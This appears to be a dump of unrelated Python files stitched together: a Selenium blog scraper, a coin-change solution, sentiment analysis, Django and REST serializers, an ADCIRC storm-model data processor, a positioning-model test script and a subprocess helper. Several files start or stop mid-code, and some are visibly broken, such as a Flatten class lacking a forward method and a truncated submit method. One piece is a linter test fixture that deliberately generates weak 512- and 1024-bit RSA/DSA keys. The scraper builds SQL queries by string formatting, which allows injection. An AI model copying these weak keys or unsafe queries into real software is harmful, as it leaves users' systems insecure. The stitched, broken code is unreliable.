types=driver.find_elements_by_xpath('//a[@rel="category tag"]')
times=driver.find_elements_by_xpath('//*[@id="archive"]/div/div/p[1]')
contents=driver.find_elements_by_class_name('excerpt')
for t,y,i,c in zip(titles,types,times,contents):
# print t.text,'-------',y.text,'-------',(re.search(r'\d{4}/\d{2}/\d{2}',i.text)).group()
title=t.text
text_type=y.text
pub_time=(re.search(r'\d{4}/\d{2}/\d{2}',i.text)).group()
content=c.text
sql='insert into jobbole1(title,text_type,time,content) values("%s","%s","%s","%s");'%(title,text_type,pub_time,content)
try:
cursor.execute(sql)
conn.commit()
except Exception,e:
print e
print title,'---',text_type,'---',pub_time,'++++++++++++'
print url
print time.time()-start
driver.close()
cursor.close()
conn.close()
starttime=time.time()
urls=('http://python.jobbole.com/all-posts/page/%s'% i for i in range(1,51))
pool=ThreadPool(4)
pool.map(get_single_page_info, urls)
pool.close()
pool.join()
print time.time()-starttime
print '--------Over--------'
|
#!/bin/python3
import math
import os
import random
import re
import sys
def getWays(n, c):
mem = [0] * (n+1)
mem[0] = 1
for coin in c:
for i in range(coin, n+1):
mem[i] += mem[i-coin]
return mem[n]
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nm = input().split()
n = int(nm[0])
m = int(nm[1])
c = list(map(int, input().rstrip().split()))
fptr.write(str(getWays(n, c)))
fptr.close()
|
import os
from conans import ConanFile, tools
class SmlConan(ConanFile):
name = "SML"
version = "latest"
license = "Boost"
url = "https://github.com/paulbendixen/sml.git"
description = "[Boost].SML: C++14 State Machine Library"
#no_copy_source = True
# No settings/options are necessary, this is header only
exports_sources = "include/*"
def package(self):
self.copy("*", src="include", dst="include")
|
import string
from collections import Counter
import matplotlib.pyplot as plt
from nltk.corpus import stopwords
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
text = open('read.txt', encoding='utf-8').read()
lower_case = text.lower()
cleaned_text = lower_case.translate(str.maketrans('', '', string.punctuation))
# Using word_tokenizer
tokenized_words = word_tokenize(cleaned_text, "english")
# Removing Stop Words
final_words = []
for word in tokenized_words:
if word not in stopwords.words('english'):
final_words.append(word)
# Lemmatization - From plural to single + Base form of a word
lemma_words = []
for word in final_words:
word = WordNetLemmatizer().lemmatize(word)
lemma_words.append(word)
emotion_list = []
with open('emotions.txt', 'r') as file:
for line in file:
clear_line = line.replace("\n", '').replace(",", '').replace("'", '').strip()
word, emotion = clear_line.split(':')
if word in lemma_words:
emotion_list.append(emotion)
print(emotion_list)
w = Counter(emotion_list)
def sentiment_analyse(sentiment_text):
score = SentimentIntensityAnalyzer().polarity_scores(sentiment_text)
neg = score['neg']
pos = score['pos']
if neg > pos:
return "Negative Sentiment"
elif pos > neg:
return "Positive Sentiment"
else:
return "Neutral Sentiment"
sentiment = sentiment_analyse(cleaned_text)
fig, ax1 = plt.subplots()
ax1.bar(w.keys(), w.values())
plt.title(sentiment)
plt.xlabel("emotions")
plt.ylabel("frequency")
fig.autofmt_xdate()
plt.savefig('graph.png')
plt.show() |
from datetime import datetime
import pandas as pd
print('\nSistema de cadastro de anúncios.\n')
anuncio = []
# Função para cadastrar
def cadastro():
nome = input('Digite o nome do anúncio: ')
cliente = input('Digite o nome do cliente: ')
# Data inicial
dataInicio = datetime.strptime(input(f'Digite a data de início (dd-mm-aaaa):'), '%d-%m-%Y')
# Data final
dataFim = datetime.strptime(input(f'Digite a data de término (dd-mm-aaaa):'), '%d-%m-%Y')
quantidade_dias = abs((dataFim - dataInicio).days) + 1
investimentoTotal = int(input('Digite o valor do investimento total: '))
investimentoDiario = investimentoTotal / quantidade_dias
anuncio.append((nome, cliente, dataInicio, dataFim, f'{quantidade_dias} dias', investimentoDiario))
# Função para visualizar cadastros
def visualizar():
dados = pd.DataFrame(anuncio, columns=['NomeAnúncio', 'Cliente', 'DataInício', 'DataFinal', 'Quant.Dias', 'Invest.Diário'])
print(dados)
# Função para filtrar
def filtro():
dados = pd.DataFrame(anuncio, columns=['NomeAnúncio', 'Cliente', 'DataInício', 'DataFinal', 'Quant.Dias', 'Invest.Diário'])
dados = dados.loc[dados['Cliente'] == input(f'Digite o nome do cliente: ')]
print(dados)
# Funcionamento do sistema
while True:
menu = int(input('''
Deseja:
[1] - Cadastrar Anúncios
[2] - Visualizar Anúncios
[3] - Filtrar por Cliente
[4] - Sair
'''))
if menu == 1:
cadastro()
elif menu == 2:
visualizar()
elif menu == 3:
filtro()
elif menu ==4:
print('Cadastros finalizados.')
break
|
from django import forms
from .models import UserAccount
class UserAccountForm(forms.ModelForm):
class Meta:
model = UserAccount
fields = ('default_first_name', 'default_last_name', 'default_phone_number',
'default_street_address1', 'default_street_address2',
'default_town_or_city', 'default_postcode',
'default_county', 'default_country')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
placeholders = {
'default_first_name': 'First Name',
'default_last_name': 'Last Name',
'default_phone_number': 'Phone Number',
'default_postcode': 'Postal Code',
'default_town_or_city': 'Town or City',
'default_street_address1': 'Street Address 1',
'default_street_address2': 'Street Address 2',
'default_county': 'County or Region',
}
# Apply placeholders
for field in self.fields:
if field != 'default_country':
placeholder = placeholders[field]
self.fields[field].widget.attrs['placeholder'] = placeholder
# Remove the field labels
self.fields[field].label = False
|
from rest_framework import serializers
from teams.serializer import TeamSerializer
from .models import Match
class MatchSerializer(serializers.ModelSerializer):
away_team = TeamSerializer(many=False)
home_team = TeamSerializer(many=False)
phase = serializers.CharField(source='get_phase_display')
winner = TeamSerializer(many=False)
class Meta:
model = Match
fields = [
'id',
'away_team',
'home_team',
'away_team_goals',
'home_team_goals',
'played',
'phase',
'winner',
]
|
import os
import pdb
import glob
import json
import dask
import logging
import datetime
import argparse
import subprocess
import numpy as np
import pandas as pd
import xarray as xa
import random as rand
from adcirc_utils import *
from time import perf_counter, sleep
from array import array
from contextlib import contextmanager
logger = logging.getLogger()
@contextmanager
def timing(label: str):
t0 = perf_counter()
yield lambda: (label, t1 - t0)
t1 = perf_counter()
def process_run_data(job_dir:str, nodes=[], param='wind_drag_parameter',
purge_runs:bool=False, update_interval:int=20):
# Get active jobs in directory
active_runs = [x for x in os.listdir(os.path.join(job_dir, 'runs')) if not x.startswith('DONE-')]
# Make raw data dir if doesn't exist
raw_data_dir = os.path.join(job_dir, 'outputs', 'raw')
# Loop through active jobs
for idx, r in enumerate(active_runs):
logger.info(f"Processing active run {r} - {idx+1}/{len(active_runs)}")
# See if end timestamp is present yet. If so mark job as done and ready to clean up
res = glob.glob(os.path.join(job_dir, 'runs', r, "ts_padcirc_*"))
job_done = True if len(res)>0 else False
# Read TS file info and collect data.j
job_ts = np.zeros(3)
for f in glob.glob(os.path.join(job_dir, 'runs', r, 'ts_*')):
if str.startswith(f, 'ts_start_'):
job_ts[0] = datetime.datetime.strptime(str.split(f, 'ts_start_')[1],
"%Y-%m-%d-%H:%M:%S").timestamp()
if str.startswith(f, 'ts_adcprep_'):
job_ts[1] = datetime.datetime.strptime(str.split(f, 'ts_adcprep_')[1],
"%Y-%m-%d-%H:%M:%S").timestamp()
if str.startswith(f, 'ts_padcirc_'):
job_ts[2] = datetime.datetime.strptime(str.split(f, 'ts_padcirc_')[1],
"%Y-%m-%d-%H:%M:%S").timestamp()
# Get param vals for sample
f13 = read_fort13(os.path.join(job_dir, 'runs', r, 'fort.13'))
n_vals = f13['ValuesPerNode'].sel(AttrName=param).item(0)
p_vals = ','.join([str(f13[f'v{x}'].sel(AttrName=param).item(0)) for x in range(n_vals)])
ncap_str_1 = f'defdim("param",{n_vals});p_vals[$param]={{{p_vals}}}'
ncap_str_2 = 'defdim("jc",3);job_ts[$jc]={' + ','.join([str(x) for x in job_ts]) + '}'
# Process fort.63 File with proc_fort.sh shell script
sample_type = r.split('_')[1]
sample_num = r.split('_')[2]
logger.debug(f"Processing fort.63.nc file.")
f63 = os.path.join(job_dir, 'runs', r, 'fort.63.nc')
cf63 = os.path.join(raw_data_dir, '.'.join([sample_type, sample_num]) + '.fort.63.nc')
proc = subprocess.Popen(["proc_fort.sh", sample_num, f63, cf63, ncap_str_1, ncap_str_2],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
out = out.decode('utf-8')
# First 16 lines contain lmod print - no error
err = '\n'.join(err.decode('utf-8').split('\n')[16:])
if err!='':
logger.error(f"Unable to clean fort.63.nc for run {r} - {err}")
else:
logger.info("Successfully cleaned fort.63.nc file.")
# if job_done ts set, then read job completion timestamps
if job_done:
# Clean run directory if purge is set
rdir = os.path.join(job_dir, 'runs', r)
if purge_runs:
logger.info(f"Purging run directory {rdir}")
res = subprocess.run(["rm", "-rf", rdir])
else:
done_rdir = os.path.join(job_dir, 'runs', 'DONE-' + r)
logger.info(f"Moving run directory {rdir} to DONE")
res = subprocess.run(["mv", rdir, done_rdir])
def pull_data_netcdf(job:str, ds_name:str, configs:dict):
sample_size = configs[ds_name].pop('samples', 100)
sample_type = configs[ds_name].pop('sample_type', 'uniform')
nodes = configs[ds_name].pop('nodes', [])
start_time = configs[ds_name].pop('start_time', None)
end_time = configs[ds_name].pop('end_time', None)
randomize = configs[ds_name].pop('randomize', False)
def pre_proc(ds, st=start_time, et=end_time, n=nodes):
ds = ds.drop_vars(['adcirc_mesh', 'depth', 'element', 'ibtype', 'ibtypee', 'max_nvdll', 'max_nvell', 'nvdll', 'nvell'])
st = ds['time'][0] if st==None else st
et = ds['time'][-1] if et==None else et
ds = ds.sel(time=slice(st, et))
ds = ds.sel(node=nodes)
ds = ds.assign_coords(param=[('\lambda_'+str(x)) for x in range(len(ds['p_vals']))])
ds = ds.assign_coords(node=nodes)
ds = ds.expand_dims({"sample":[ds['p_vals'].attrs['sample']]})
output = xa.Dataset({"param_samples": ds['p_vals'],
"water_levels": ds['zeta'].transpose("node",...)})
return output
sample_type = (sample_type + '.') if sample_type != '' else sample_type
sample_files = glob.glob(os.path.join(job, 'outputs', 'raw', sample_type + '*.nc'))
sample_size = len(sample_files) if sample_size>len(sample_files) else sample_size
sample_files = sample_files[0:sample_size]
all_ds = []
logger.info(f"Pulling data from {sample_size} data files.")
# logger.info("Files = %s" % ','.join([sample_files]))
for i, s in enumerate(sample_files):
logger.info(f"Processing {s} - {i}/{sample_size}")
try:
ds = xa.open_dataset(s)
except Exception as e:
logger.error(f"Unable to load {s} - {e}")
continue
all_ds.append(pre_proc(ds))
ds.close()
if len(all_ds)>0:
logger.info(f"Concatenating {len(all_ds)} datasets.")
output = xa.concat(all_ds, "sample")
fpath = os.path.join(job, 'outputs', 'requests', ds_name + '.nc')
logger.info(f"Writing output dataset to {fpath}")
output.to_netcdf(fpath)
output.close()
# Unknown error occuring with open_mfdataset
# pdb.set_trace()
# logger.info(f"Pulling data from {sample_size} data files.")
# logger.info("Files = %s" % ','.join([sample_files]))
# with xa.open_mfdataset(sample_files, parallel=True, preprocess=pre_proc) as ds:
# fpath = os.path.join(job, 'outputs', ds_name + '.nc')
# logger.info(f"Writing output netcdf file to {fpath}")
# output.to_netcdf(fpath)
return output
else:
return None
def load_configs(config_dir:str):
configs = os.listdir(config_dir)
res = {}
for conf in configs:
if not (conf.startswith('.') or conf.endswith('.done') or conf.endswith('.error')):
try:
name = conf.split('.json')[0]
with open(os.path.join(config_dir,conf), 'r') as cf:
res[name] = json.load(cf)
except Exception as e:
logger.info(f"Unable to load config {conf} - {e}.")
return res
def main_loop(job_dir:str, update_interval:int=30):
logger.info(f"Loading base adcirc configs.")
adcirc_configs = process_adcirc_configs(os.path.join(job_dir,'base_inputs'))
# Make raw data dir if doesn't exist
raw_data_dir = os.path.join(job_dir, 'outputs', 'raw')
res = subprocess.run(["mkdir", "-p", raw_data_dir])
# Make data output dir if doesn't exist
data_dir = os.path.join(job_dir, 'outputs', 'requests')
res = subprocess.run(["mkdir", "-p", data_dir])
global_nodes = []
while True:
if len(glob.glob(os.path.join(job_dir, 'END-DP')))>0:
res = subprocess.run(["rm", os.path.join(job_dir, 'END-DP')])
logger.info("Found END-DP file - Terminating data processing.")
break
# Load data request configs
configs = load_configs(os.path.join(job_dir, 'out_data_configs'))
for name in configs.keys():
logger.info(f"Found config {name}")
if 'coordinates' in configs[name].keys():
logger.info(f"Calculating nodes closest to coordiantes.")
for coord in configs[name]['coordinates']:
configs[name]['nodes'].append(find_closest(adcirc_configs['X'].values,
adcirc_configs['Y'].values,
coord[0], coord[1]))
configs[name]['nodes'] = sorted(set(configs[name]['nodes']))
if name=='global':
logger.info(f"Found global config! Updating global node list.")
global_nodes = configs[name]['nodes']
configs.drop('global')
# Process run data
res = process_run_data(job_dir, nodes=global_nodes)
# Now process each data pull request config. If successful, then delete request config
for name in configs.keys():
# try:
msg = f"Processing data request {name}\n"
msg += f"Processing data request {name}\n"
msg += f"Nodes: {configs[name]['nodes']}\n"
msg += f"Start Time: {configs[name]['start_time']}\n"
msg += f"End Time: {configs[name]['end_time']}\n"
logger.info(msg)
with timing(name) as pull_data:
res = pull_data_netcdf(job_dir, name, configs)
logger.info(f"Processed data request {name} successfully! Moving to done status.")
logger.info('Total [%s]: %.6f s' % pull_data())
# res = subprocess.run(["mv", os.path.join(job_dir, 'out_data_configs', name+'.json'),
# os.path.join(job_dir, 'out_data_configs', name+'.json.done')])
# except Exception as e:
# logger.info(f"Unable to pull data for request {name} - {e}. Moving to error status.")
# res = subprocess.run(["mv", os.path.join(job_dir, 'out_data_configs', name+'.json'),
# os.path.join(job_dir, 'out_data_configs', name+'.json.error')])
# Sleep until we update data again
logger.info(f"Sleeping for {update_interval} seconds.")
sleep(update_interval)
if __name__ == "__main__":
# Parse command line options
parser = argparse.ArgumentParser()
parser.add_argument('job_dir', type=str, help='Full path to job directory.')
parser.add_argument('-m', '--mode', choices=['MAIN', 'PULL_DATA'], type=str,
default='MAIN', help='Mode to run. Defauls to main execution.')
parser.add_argument('-u', '--update_interval', type=int, default=300,
help="Data pull wait time in seconds.")
parser.add_argument('-lf', '--log_file', type=str, default=None, help="Path to log file.")
parser.add_argument('-ll', '--log_level', type=str, default='INFO',
choices=['DEBUG','INFO','WARNING','ERROR','CRITICAL'], help='Set the logging level')
args = parser.parse_args()
# Initialize logger
if args.log_file!=None:
logging.basicConfig(level=args.log_level, filename=args.log_file,
format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
else:
logging.basicConfig(level=args.log_level,
format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
while True:
# Keep Trying main loop
main_loop(args.job_dir, update_interval=args.update_interval)
try:
if args.mode=='MAIN':
# Call main loop
main_loop(args.job_dir, update_interval=args.update_interval)
else:
raise Exception("Unrecognized mode {args.mode}")
except Exception as e:
# Shouldn't get here. But keep retrying if not in PULL_DATA Mode
logger.critical("Unexpected error encountered!")
|
class myTest:
import pry
def __init__(self, val):
self.interface = "test" + val
def dodo(self):
print(self.interface)
self.pry() |
import os
import numpy as np
dataset_folder = '/home/priya/code/data_volume/timecycle'
outlist = os.path.join(dataset_folder, 'davis/DAVIS/vallist.txt')
imgfolder = os.path.join(dataset_folder, 'davis/DAVIS/JPEGImages/480p/')
lblfolder = os.path.join(dataset_folder, 'davis/DAVIS/Annotations/480p/')
jpglist = []
f1 = open(os.path.join(dataset_folder, 'davis/DAVIS/ImageSets/2017/val.txt'), 'r')
for line in f1:
line = line[:-1]
jpglist.append(line)
f1.close()
f = open(outlist, 'w')
for i in range(len(jpglist)):
fname = jpglist[i]
fnameim = imgfolder + fname + '/'
fnamelbl= lblfolder + fname + '/'
if len(os.listdir(fnameim)) > 20:
f.write(fnameim + ' ' + fnamelbl + '\n')
f.close()
|
import os, sys
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
PROJECT_NAME = os.path.basename(PROJECT_ROOT)
sys.path.insert(0, PROJECT_ROOT)
sys.path.insert(0, os.path.abspath(os.path.join(PROJECT_ROOT, os.pardir)))
venv_path = os.path.abspath(os.path.join(PROJECT_ROOT, "../../../"))
activate_this = os.path.join(venv_path, "bin/activate_this.py")
execfile(activate_this, dict(__file__=activate_this))
sys.stderr.write("WSGI Python Path (Importer): %s\n" % sys.path)
os.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % PROJECT_NAME
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
|
from cryptography.hazmat import backends
from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.asymmetric import rsa
from Crypto.PublicKey import DSA
from Crypto.PublicKey import RSA
# Correct
dsa.generate_private_key(key_size=2048,
backend=backends.default_backend())
rsa.generate_private_key(public_exponent=65537,
key_size=2048,
backend=backends.default_backend())
DSA.generate(bits=2048)
RSA.generate(bits=2048)
# Also correct: without keyword args
dsa.generate_private_key(4096,
backends.default_backend())
ec.generate_private_key(ec.SECP256K1,
backends.default_backend())
rsa.generate_private_key(3,
4096,
backends.default_backend())
DSA.generate(4096)
RSA.generate(4096)
# Incorrect: weak key sizes
dsa.generate_private_key(key_size=1024,
backend=backends.default_backend())
rsa.generate_private_key(public_exponent=65537,
key_size=1024,
backend=backends.default_backend())
DSA.generate(bits=1024)
RSA.generate(bits=1024)
# Also incorrect: without keyword args
dsa.generate_private_key(512,
backends.default_backend())
ec.generate_private_key(ec.SECT163R2,
backends.default_backend())
rsa.generate_private_key(3,
512,
backends.default_backend())
DSA.generate(512)
RSA.generate(512)
|
import schedule
import time
import days2 as d
import stopRunning2 as stp
schedule.every().friday.at("00:00").do(d.mondayToWednesdayAndWeekendPrayer)
schedule.every().sunday.at("00:00").do(d.mondayToWednesdayAndWeekendPrayer)
schedule.every().monday.at("00:00").do(d.mondayToWednesdayAndWeekendPrayer)
schedule.every().tuesday.at("00:00").do(d.mondayToWednesdayAndWeekendPrayer)
schedule.every().saturday.at("00:00").do(d.mondayToWednesdayAndWeekendPrayer)
schedule.every().wednesday.at("00:00").do(d.thursdayPrayer)
schedule.every().thursday.at("00:00").do(d.fridayPrayer)
schedule.every().day.at("00:21").do(stp.stopRec)
while True:
schedule.run_pending()
time.sleep(1)
|
import numpy as np
from sklearn.cluster import KMeans
import pickle as pkl
print ('data preparing ...')
# read the src
datapath = '../../data/'
data = np.genfromtxt(datapath + 'Sepsis_imp.csv', dtype=float, delimiter=',', skip_header=1)
# remove intervention, but include ventilation, sedation, RRT
interventions = np.setdiff1d(np.arange(47, 57), [51,52,54,55,56]) #[52,53,55,57]
data = np.delete(data, interventions, axis=1)
data = np.delete(data, [0,1,2], axis=1)
data = (data - np.mean(data, axis=0)) / np.std(data, axis=0)
print ('clustering ...')
kmeans = KMeans(n_clusters=2000, random_state=0).fit(data)
states_list = kmeans.labels_
centers = kmeans.cluster_centers_
pkl.dump(states_list, open(datapath + 'states_list.pkl', 'wb'))
pkl.dump(centers, open(datapath + 'centers.pkl', 'wb'))
|
for _ in range(int(input())):
n = int(input())
arr = list(map(int, input().split()))
max_ans = 0
check_ans = 0
tot_ind = 0
min_val = 0
for i in arr:
tot_ind += 1
if min_val == 0:
min_val = i
else:
if i < min_val:
min_val = i
check_ans = min_val*tot_ind
if check_ans > max_ans:
pass |
# WORK IN PROGRESS
class Flatten(nn.Module):
def flatten(x):
N = x.shape[0] # read in N, C, H, W
return x.view(N, -1) # "flatten" the C * H * W values into a single vector per image
hidden_layer_size = 4000
learning_rate = 1e-2
input_dim = 20
num_channels = 3
model = nn.Sequential(
Flatten(),
nn.Linear(input_dim * input_dim * num_channels, hidden_layer_size),
nn.ReLU(),
nn.Linear(hidden_layer_size, 10)
)
# you can use Nesterov momentum in optim.SGD
optimizer = optim.SGD(model.parameters(), lr=learning_rate,
momentum=0.9, nesterov=True)
# loader_train = DataLoader(cifar10_train, batch_size=64,
# sampler=sampler.SubsetRandomSampler(range(NUM_TRAIN)))
def train(model, optimizer, epochs=1):
model = model.to(device=device) # move the model parameters to CPU/GPU
for e in range(epochs):
for t, (x, y) in enumerate(loader_train):
model.train() # put model to training mode
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model(x)
loss = F.cross_entropy(scores, y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if t % print_every == 0:
print('Iteration %d, loss = %.4f' % (t, loss.item()))
check_accuracy_part34(loader_val, model)
print()
train(model, optimizer) |
import bugzilla
import configuration
import logging
URL = configuration.get_config(parameter_type='bugzilla-creds', parameter_name='bugzilla_url')
bzapi = bugzilla.Bugzilla(URL)
default_product = configuration.get_config(parameter_type='default-params', parameter_name='default_product')
default_component = configuration.get_config(parameter_type='default-params', parameter_name='default_component')
def normalize_component_new(selected_component, selected_product):
# TODO Temporary fix. Figure out why sometimes None product
# print('default product is: ' + default_product + ' and default component is: ' + default_component)
if not selected_product:
selected_product = default_product
components = bzapi.getcomponents(product=selected_product)
lowered_components = [item.lower() for item in components]
if not selected_component:
return ''
if selected_component in lowered_components:
index = lowered_components.index(selected_component)
return components[index]
else:
print('selected component is not in there')
def normalize_product_new(selected_product):
if not selected_product:
selected_product = default_product
include_fields = ["name", "id"]
products = bzapi.getproducts(include_fields=include_fields)
products_list = []
for product in products:
single_product1 = str(list(product.values())[0])
single_product2 = str(list(product.values())[1])
if not isproductalpha(single_product1) and not isproductalpha(single_product2):
print('name and id are numbers, need to skip this product ' + single_product1 + " " + single_product2)
else:
if isproductalpha(single_product1):
single_product = single_product1
else:
single_product = single_product2
products_list.append(single_product)
lowered_products = [item.lower() for item in products_list]
if selected_product.lower() in lowered_products:
index = lowered_products.index(selected_product.lower())
return products_list[index]
else:
print('something\'s wrong')
def isproductalpha(product):
# TODO Fix this ugly stuff
if ' ' in product:
return True
elif '-' in product:
return True
elif '.' in product:
return True
elif '_' in product:
return True
elif product.isalpha():
return True
else:
return False |
"""
Runs the test dataset over the data, and stores the predictions
The arguments are loaded from a .yaml file, which is the input argument of this script
(Instructions to run: `python test_model.py <path to .yaml file>`)
"""
import os
import sys
import time
import logging
import pickle
import yaml
import numpy as np
from tqdm import tqdm
from bff_positioning.data import Preprocessor, PathCreator, create_noisy_features, \
get_95th_percentile, undersample_bf, undersample_space, sample_paths
from bff_positioning.models import CNN, LSTM, TCN
from bff_positioning.models.metrics import score_predictions
def main():
"""Main block of code, which runs the tests"""
start = time.time()
logging.basicConfig(level="INFO")
# Load the .yaml data and unpacks it
assert len(sys.argv) == 2, "Exactly one experiment configuration file must be "\
"passed as a positional argument to this script. \n\n"\
"E.g. `python run_non_tracking_experiment.py <path to .yaml file>`"
with open(sys.argv[1], "r") as yaml_config_file:
logging.info("Loading simulation settings from %s", sys.argv[1])
experiment_config = yaml.load(yaml_config_file)
experiment_settings = experiment_config['experiment_settings']
data_parameters = experiment_config['data_parameters']
ml_parameters = experiment_config['ml_parameters']
path_parameters = experiment_config['path_parameters'] \
if 'path_parameters' in experiment_config else None
# Loads the raw dataset
logging.info("Loading the dataset...")
data_preprocessor = Preprocessor(data_parameters)
features, labels = data_preprocessor.load_dataset()
if path_parameters:
path_creator = PathCreator(data_parameters, path_parameters, labels)
paths = path_creator.load_paths()
# Undersamples the dataset (if requested)
if "undersample_bf" in experiment_settings and experiment_settings["undersample_bf"]:
features = undersample_bf(features, data_parameters["beamformings"])
if "undersample_space" in experiment_settings:
assert not path_parameters, "This option is not supported for tracking experiments, "\
"unless the code for the path creation is updated"
features, labels = undersample_space(features, labels, data_parameters["undersample_space"])
# Initializes the model and prepares it for testing
logging.info("Initializing the model (type = %s)...", experiment_settings["model_type"].lower())
if experiment_settings["model_type"].lower() == "cnn":
ml_parameters["input_type"] = "float"
model = CNN(ml_parameters)
elif experiment_settings["model_type"].lower() in ("lstm", "tcn"):
assert path_parameters, "This model requires `paths_parameters`. See the example."
assert path_parameters["time_steps"] == ml_parameters["input_shape"][0], "The ML model "\
"first input dimention must match the length of the paths! (path length = {}, model)"\
"input = {})".format(path_parameters["time_steps"], ml_parameters["input_shape"][0])
ml_parameters["input_type"] = "bool"
if experiment_settings["model_type"].lower() == "lstm":
model = LSTM(ml_parameters)
else:
model = TCN(ml_parameters)
else:
raise ValueError("The simulation settings specified 'model_type'={}. Currently, only "
"'cnn', 'lstm', and 'tcn' are supported.".format(experiment_settings["model_type"]))
experiment_name = os.path.basename(sys.argv[1]).split('.')[0]
model.load(model_name=experiment_name)
# Prediction loop
mc_dropout_samples = ml_parameters.get("mc_dropout", 0)
if mc_dropout_samples:
logging.info("Evaluation mode: MC Dropout sampling")
tests_per_input = 1
elif "tests_per_position" in experiment_settings:
logging.info("Evaluation mode: Single-point position estimates")
tests_per_input = experiment_settings["tests_per_position"]
else:
logging.info("Evaluation mode: Path-based position estimates")
logging.info("Note - each set of paths will be split into 10 sub-sets, for easier RAM"
"management -- that's why you'll see 10x test sets in the next logging messages.")
tests_per_input = experiment_settings["tests_per_path"] * 10
y_true = []
y_pred = []
for set_idx in range(tests_per_input):
logging.info("Creating test set %2s out of %2s...", set_idx+1, tests_per_input)
if path_parameters:
features_test, labels_test, _ = sample_paths(
paths["test"],
features,
labels,
experiment_settings,
data_parameters,
path_parameters,
sample_fraction=0.1
)
else:
features_test, labels_test = create_noisy_features(
features,
labels,
experiment_settings,
data_parameters,
)
logging.info("Running predictions and storing data...\n")
y_true.append(labels_test)
if not mc_dropout_samples: # MC Dropout OFF
predictions_test = model.predict(features_test)
y_pred.append(predictions_test)
else: # MC Dropout ON
for sample_rnd in tqdm(range(mc_dropout_samples)):
predictions_test = model.predict(features_test)
y_pred.append(predictions_test)
# Stack results and sanity check
y_true = np.vstack(y_true)
if mc_dropout_samples:
y_pred = np.stack(y_pred, axis=2)
else:
y_pred = np.vstack(y_pred)
assert y_true.shape[0] == y_pred.shape[0], \
"The predictions and the labels must have the same number of examples!"
assert y_true.shape[1] == y_pred.shape[1], \
"The number of dimensions per sample must stay constant!"
# Closes the model, gets the test scores, and stores predictions-labels pairs
model.close()
if not mc_dropout_samples: # Doesn't make sense to test MCDropout samples, they underperform :)
logging.info("Computing test metrics...")
test_score = score_predictions(y_true, y_pred, ml_parameters["validation_metric"])
test_score *= data_parameters["pos_grid"][0]
test_95_perc = get_95th_percentile(
y_true,
y_pred,
rescale_factor=data_parameters["pos_grid"][0]
)
logging.info("Average test distance: %.5f m || 95th percentile: %.5f m\n",
test_score, test_95_perc)
preditions_file = os.path.join(
ml_parameters["model_folder"],
experiment_name + '_' + experiment_settings["predictions_file"]
)
with open(preditions_file, 'wb') as data_file:
pickle.dump([y_true, y_pred], data_file)
# Prints elapsed time
end = time.time()
exec_time = (end-start)
logging.info("Total execution time: %.5E seconds", exec_time)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""
Execution utilities.
"""
import multiprocessing
import concurrent.futures as cf
import subprocess
import logging
import gc
from math import floor
import os
import psutil
import getpass
import shlex
from warnings import warn
from rex.utilities.loggers import LOGGERS, log_mem
from rex.utilities.exceptions import (ExecutionError, SlurmWarning,
ParallelExecutionWarning)
logger = logging.getLogger(__name__)
class SubprocessManager:
"""Base class to handle subprocess execution."""
# get username as class attribute.
USER = getpass.getuser()
@staticmethod
def make_path(d):
"""Make a directory tree if it doesn't exist.
Parameters
----------
d : str
Directory tree to check and potentially create.
"""
if not os.path.exists(d):
os.makedirs(d)
@staticmethod
def make_sh(fname, script):
"""Make a shell script (.sh file) to execute a subprocess.
Parameters
----------
fname : str
Name of the .sh file to create.
script : str
Contents to be written into the .sh file.
"""
logger.debug('The shell script "{n}" contains the following:\n'
'~~~~~~~~~~ {n} ~~~~~~~~~~\n'
'{s}\n'
'~~~~~~~~~~ {n} ~~~~~~~~~~'
.format(n=fname, s=script))
with open(fname, 'w+') as f:
f.write(script)
@staticmethod
def rm(fname):
"""Remove a file.
Parameters
----------
fname : str
Filename (with path) to remove.
"""
os.remove(fname)
@staticmethod
def _subproc_popen(cmd):
"""Open a subprocess popen constructor and submit a command.
Parameters
----------
cmd : str
Command to be submitted using python subprocess.
Returns
-------
stdout : str
Subprocess standard output. This is decoded from the subprocess
stdout with rstrip.
stderr : str
Subprocess standard error. This is decoded from the subprocess
stderr with rstrip. After decoding/rstrip, this will be empty if
the subprocess doesn't return an error.
"""
cmd = shlex.split(cmd)
# use subprocess to submit command and get piped o/e
process = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
stderr = stderr.decode('ascii').rstrip()
stdout = stdout.decode('ascii').rstrip()
if process.returncode != 0:
raise OSError('Subprocess submission failed with return code {} '
'and stderr:\n{}'
.format(process.returncode, stderr))
return stdout, stderr
@staticmethod
def _subproc_run(cmd, background=False, background_stdout=False,
shell=True):
"""Open a subprocess and submit a command.
Parameters
----------
cmd : str
Command to be submitted using python subprocess.
background : bool
Flag to submit subprocess in the background. stdout stderr will
be empty strings if this is True.
background_stdout : bool
Flag to capture the stdout/stderr from the background process
in a nohup.out file.
"""
nohup_cmd = None
if background and background_stdout:
nohup_cmd = 'nohup {} &'
elif background and not background_stdout:
nohup_cmd = 'nohup {} </dev/null >/dev/null 2>&1 &'
if nohup_cmd is not None:
cmd = nohup_cmd.format(cmd)
shell = True
subprocess.run(cmd, shell=shell)
@staticmethod
def submit(cmd, background=False, background_stdout=False):
"""Open a subprocess and submit a command.
Parameters
----------
cmd : str
Command to be submitted using python subprocess.
background : bool
Flag to submit subprocess in the background. stdout stderr will
be empty strings if this is True.
background_stdout : bool
Flag to capture the stdout/stderr from the background process
in a nohup.out file.
Returns
-------
stdout : str
Subprocess standard output. This is decoded from the subprocess
stdout with rstrip.
stderr : str
Subprocess standard error. This is decoded from the subprocess
stderr with rstrip. After decoding/rstrip, this will be empty if
the subprocess doesn't return an error.
"""
